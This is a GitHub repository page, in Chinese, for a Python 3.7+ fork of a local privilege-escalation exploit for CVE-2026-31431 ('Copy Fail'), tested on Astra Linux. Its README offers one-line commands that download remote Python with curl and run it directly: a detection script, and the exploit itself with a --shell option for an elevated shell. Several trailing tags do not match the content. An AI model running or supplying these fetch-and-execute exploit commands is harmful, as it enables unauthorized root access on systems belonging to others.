p401a-ops/Copy-Fail

GitHub: p401a-ops/Copy-Fail

兼容 Python 3.7+ 的 CVE-2026-31431 本地权限提升漏洞检测与利用工具,解决旧版 Linux 发行版无法运行原版 exploit 的问题。

Stars: 0 | Forks: 0

# CVE-2026-31431 "Copy Fail" - 本地权限提升 ## 兼容 Python 3.7+ 的版本(包括 Astra Linux) 安全检查(无漏洞利用): ``` curl -s https://raw.githubusercontent.com/p401a-ops/Copy-Fail/refs/heads/main/detect.py | python3 ``` 漏洞利用(提示时需要输入用户密码) ``` python3 -c "$(curl -s https://raw.githubusercontent.com/p401a-ops/Copy-Fail/refs/heads/main/exp.py)" --shell ``` ## 此漏洞利用版本 **这是一个适配 Python 3.7、3.8、3.9、3.10、3.11 的 fork。** 原版漏洞利用由于使用了 `os.splice()`,因此需要 Python 3.12+。 ### 为什么原版无法运行? ``` # ❌ 原始 exploit (仅限 Python 3.12+) os.splice(fd_in, fd_out, length, offset_src=offset) # AttributeError: module 'os' has no attribute 'splice' ``` ### 此 fork 做了哪些更改? * 移除了对 `os.splice()` 的依赖 * 增加了对 Python 3.7+ 的兼容性 * 漏洞利用已在 Astra Linux 上通过测试 * 保留了对现代发行版的兼容性 * 增加了简单的 one-liner 运行方式 ### 注意事项 * 需要对系统的本地访问权限 * 系统中必须已安装 Python * 已在 Astra Linux CE/SE 上通过测试 * 无需 Python 3.12+ 即可运行
标签:Astra Linux, Copy Fail, CVE-2026-31431, Exploit开发, Linux提权, POC, Python 3.7兼容性, Python安全脚本, Web报告查看器, 子域名枚举, 本地提权, 漏洞复现, 系统安全, 系统权限提升, 网络安全, 逆向工具, 隐私保护